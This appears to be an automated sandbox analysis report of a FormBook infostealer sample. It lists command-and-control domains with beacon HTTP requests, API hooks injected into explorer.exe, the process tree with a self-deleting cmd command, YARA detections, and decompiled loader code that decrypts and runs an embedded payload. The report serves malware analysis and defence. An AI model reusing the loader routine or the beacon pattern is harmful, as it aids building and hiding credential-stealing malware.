                                            • www.7852bigbucktrail.info
                                            • www.toastxpress.com
                                            • www.unitvn.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.64974618.209.115.2680C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:47:46.489367962 CET5902OUTGET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
                                            Host: www.7852bigbucktrail.info
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:47:46.651639938 CET5903INHTTP/1.1 301 Moved Permanently
                                            Date: Wed, 13 Jan 2021 20:47:46 GMT
                                            Server: Apache
                                            Location: https://www.atproperties.com/10821807/nei?&ref=TQK&pt=&agent=8578
                                            Content-Length: 0
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.649748161.35.25.24780C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:48:09.018440962 CET5904OUTGET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
                                            Host: www.toastxpress.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:48:09.058456898 CET5904INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Wed, 13 Jan 2021 20:48:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 178
                                            Connection: close
                                            Location: https://www.toastxpress.com/krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.649755112.213.89.13080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:49:10.974819899 CET5966OUTGET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
                                            Host: www.unitvn.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:49:11.219010115 CET5967INHTTP/1.1 404 Not Found
                                            Connection: close
                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                            Pragma: no-cache
                                            Content-Type: text/html
                                            Content-Length: 1237
                                            Date: Wed, 13 Jan 2021 20:49:10 GMT
                                            Server: LiteSpeed
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70
                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSp
                                            Jan 13, 2021 21:49:11.219032049 CET5968INData Raw: 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76
                                            Data Ascii: eed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: RRW9901200241.exe PID: 3016 Parent PID: 5932

                                            General

                                            Start time:21:46:41
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\RRW9901200241.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\RRW9901200241.exe'
                                            Imagebase:0xd80000
                                            File size:333312 bytes
                                            MD5 hash:61FFB4AD4721F51413075923B2E9468D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: RRW9901200241.exe PID: 6148 Parent PID: 3016

                                            General

                                            Start time:21:46:43
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\RRW9901200241.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\RRW9901200241.exe'
                                            Imagebase:0xd80000
                                            File size:333312 bytes
                                            MD5 hash:61FFB4AD4721F51413075923B2E9468D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: explorer.exe PID: 3440 Parent PID: 6148

                                            General

                                            Start time:21:46:47
                                            Start date:13/01/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0x7ff6f22f0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: cmd.exe PID: 6476 Parent PID: 3440

                                            General

                                            Start time:21:47:01
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                            Imagebase:0x2a0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: cmd.exe PID: 6556 Parent PID: 6476

                                            General

                                            Start time:21:47:06
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\RRW9901200241.exe'
                                            Imagebase:0x2a0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: conhost.exe PID: 6536 Parent PID: 6556

                                            General

                                            Start time:21:47:06
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61de10000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Disassembly

                                            Code Analysis

                                            Reset < >

                                              Analysis Process: RRW9901200241.exe PID: 3016 Parent PID: 5932 RRW9901200241.exeCOMMON

                                              Executed Functions

                                              Function 00D81000, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 175librarymemoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E00D81000(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _v48;
				void* _v1048;
				void* _v7712;
				void* __ebp;
				void* _t122;
				void* _t123;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t166;

				_t166 = __fp0;
				_t159 = __esi;
				_t158 = __edi;
				_t123 = __ecx;
				E00D88710(0x1e1c);
				_v16 = GetModuleHandleW(L"Kernel32.dll");
				E00D86B20(_t123); // executed
				_v44 = E00D86A10(_v16, 0xb616c5d9);
				_v40 = E00D86A10(_v16, 0xe0baa99);
				_v32 = E00D86A10(LoadLibraryW(L"User32.dll"), 0x23fdef72);
				_v24 = E00D86A10(LoadLibraryW(L"User32.dll"), 0x695c9378);
				_v36 = E00D86A10(_v16, 0x9347c911);
				_v28 = _v36(0, L"IEUCIZEO", 0xa);
				_v20 = _v40(0, _v28);
				E00D87A80( &_v7712, _v20, 0x1a05);
				_t162 = _t161 + 0xc;
				_v12 = 0;
				while(_v12 < 0x1a05) {
					_v5 =  *((intOrPtr*)(_t160 + _v12 - 0x1e1c));
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x4b;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x0000001b;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x97;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 5;
					_v5 =  !(_v5 & 0x000000ff);
					 *((char*)(_t160 + _v12 - 0x1e1c)) = _v5;
					_v12 = _v12 + 1;
				}
				VirtualProtect( &_v7712, 0x1a05, 0x40,  &_v48);
				GrayStringW(_v24(0), 0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0);
				E00D82180( &_v7712, _t158, _t159, __eflags);
				while(1) {
					E00D81320(_t158, _t159, __eflags, 8, 9, 0x46, 0xd);
					E00D81250(0xa, 0xb);
					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
					E00D870FC(_t122, _t158, _t159, __eflags);
					_t162 = _t162 + 4;
					__eflags = (_v5 & 0x000000ff) - 0x41;
					if((_v5 & 0x000000ff) == 0x41) {
						break;
					}
					__eflags = (_v5 & 0x000000ff) - 0x61;
					if((_v5 & 0x000000ff) != 0x61) {
						__eflags = (_v5 & 0x000000ff) - 0x53;
						if((_v5 & 0x000000ff) == 0x53) {
							L10:
							E00D835B0(_t122, _t158, _t159, _t166);
						} else {
							__eflags = (_v5 & 0x000000ff) - 0x73;
							if((_v5 & 0x000000ff) != 0x73) {
								__eflags = (_v5 & 0x000000ff) - 0x1b;
								if((_v5 & 0x000000ff) == 0x1b) {
									E00D87751(0);
								}
								__eflags = 1;
								if(1 != 0) {
									continue;
								}
							} else {
								goto L10;
							}
						}
					} else {
						break;
					}
					L14:
					__eflags = 0;
					return 0;
				}
				E00D82290(_t158, _t159, _t166);
				goto L14;
			}

























                                              0x00d81000
                                              0x00d81000
                                              0x00d81000
                                              0x00d81000
                                              0x00d81008
                                              0x00d81018
                                              0x00d8101b
                                              0x00d8102e
                                              0x00d8103f
                                              0x00d81058
                                              0x00d81071
                                              0x00d81082
                                              0x00d81091
                                              0x00d8109d
                                              0x00d810b0
                                              0x00d810b5
                                              0x00d810b8
                                              0x00d810ca
                                              0x00d810e1
                                              0x00d810eb
                                              0x00d810f5
                                              0x00d810fe
                                              0x00d81111
                                              0x00d8111a
                                              0x00d81124
                                              0x00d8112e
                                              0x00d81138
                                              0x00d81141
                                              0x00d8114e
                                              0x00d81157
                                              0x00d81161
                                              0x00d8116a
                                              0x00d81174
                                              0x00d8117d
                                              0x00d81186
                                              0x00d810c7
                                              0x00d810c7
                                              0x00d811a4
                                              0x00d811c7
                                              0x00d811ca
                                              0x00d811cf
                                              0x00d811d7
                                              0x00d811e0
                                              0x00d811e5
                                              0x00d811ea
                                              0x00d811ef
                                              0x00d811f6
                                              0x00d811f9
                                              0x00000000
                                              0x00000000
                                              0x00d811ff
                                              0x00d81202
                                              0x00d8120f
                                              0x00d81212
                                              0x00d8121d
                                              0x00d8121d
                                              0x00d81214
                                              0x00d81218
                                              0x00d8121b
                                              0x00d81228
                                              0x00d8122b
                                              0x00d8122f
                                              0x00d8122f
                                              0x00d81239
                                              0x00d8123b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8121b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8123d
                                              0x00d8123d
                                              0x00d81242
                                              0x00d81242
                                              0x00d81204
                                              0x00000000

                                              APIs
                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00D88942,00D80000,00000000,00000000), ref: 00D81012
                                                • Part of subcall function 00D86B20: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B2C
                                                • Part of subcall function 00D86B20: RtlAllocateHeap.NTDLL(00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B33
                                                • Part of subcall function 00D86B20: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B6D
                                                • Part of subcall function 00D86B20: HeapAlloc.KERNEL32(00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B74
                                              • LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,00D88942,00D80000,00000000,00000000), ref: 00D8104C
                                              • LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,00D88942,00D80000,00000000,00000000), ref: 00D81065
                                              • _memmove.LIBCMT ref: 00D810B0
                                              • VirtualProtect.KERNELBASE(?,00001A05,00000040,?), ref: 00D811A4
                                              • GrayStringW.USER32(00000000), ref: 00D811C7
                                              • _wprintf.LIBCMT ref: 00D811EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Heap$LibraryLoadProcess$AllocAllocateGrayHandleModuleProtectStringVirtual_memmove_wprintf
                                              • String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
                                              • API String ID: 1383926253-1224953502
                                              • Opcode ID: d7ebf4af52c79fe2bec2d8ea907d67fa56d8dbbe9725e7eedb4dc43078e98c68
                                              • Instruction ID: 4ef1d154a9fd4554469a6620f4d84a886d29f7c59e2a93ead367d02987612cd2
                                              • Opcode Fuzzy Hash: d7ebf4af52c79fe2bec2d8ea907d67fa56d8dbbe9725e7eedb4dc43078e98c68
                                              • Instruction Fuzzy Hash: 6F618D78D4C2D8BACB01EBF48895BFDBFB4AF16301F1480C5E595B6282C675474A8B31
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D86B20, Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 41%
                                              			E00D86B20(void* __ecx) {
				void* _v8;
				void* _t5;
				void* _t7;
				void* _t14;

				_t14 = __ecx;
				_push(__ecx);
				_t5 = RtlAllocateHeap(GetProcessHeap(), 1, 0x17d78400); // executed
				_v8 = _t5;
				_push(_t5);
				if(_t5 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t7);
				if(_v8 != 0) {
					E00D86BF0(_t14, _v8, 0x17d78400);
					_push(_t11);
					asm("cld");
					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
				}
				return _t7;
			}







                                              0x00d86b20
                                              0x00d86b23
                                              0x00d86b33
                                              0x00d86b39
                                              0x00d86b3c
                                              0x00d86b40
                                              0x00d86b44
                                              0x00d86b45
                                              0x00d86b49
                                              0x00d86b4a
                                              0x00d86b4f
                                              0x00d86b5d
                                              0x00d86b62
                                              0x00d86b67
                                              0x00d86b74
                                              0x00d86b74
                                              0x00d86b7e

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B2C
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B33
                                              • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B6D
                                              • HeapAlloc.KERNEL32(00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B74
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Heap$Process$AllocAllocate
                                              • String ID:
                                              • API String ID: 1154092256-0
                                              • Opcode ID: 511e712a529a354b883824cb823d51adc686660b2830cfab2cc461baeb67d8f9
                                              • Instruction ID: 249cb68a48d339baeceb0e3307d804957b3a36bc8dda424e3d6fc72151e4afd6
                                              • Opcode Fuzzy Hash: 511e712a529a354b883824cb823d51adc686660b2830cfab2cc461baeb67d8f9
                                              • Instruction Fuzzy Hash: 0BF05EB1941218BFEB0067B4AC5EFAFB7ACE706B19F600555F609D3260C97299089770
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D88847, Relevance: 16.6, APIs: 11, Instructions: 84COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				intOrPtr _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t28;
				signed int _t38;
				void* _t40;
				void* _t46;
				signed int _t49;
				void* _t51;
				void* _t53;
				void* _t60;

				_t60 = __fp0;
				_t47 = __edi;
				_t46 = __edx;
				E00D8FBE8();
				_push(0x14);
				_push(0xd9d838);
				E00D89100(__ebx, __edi, __esi);
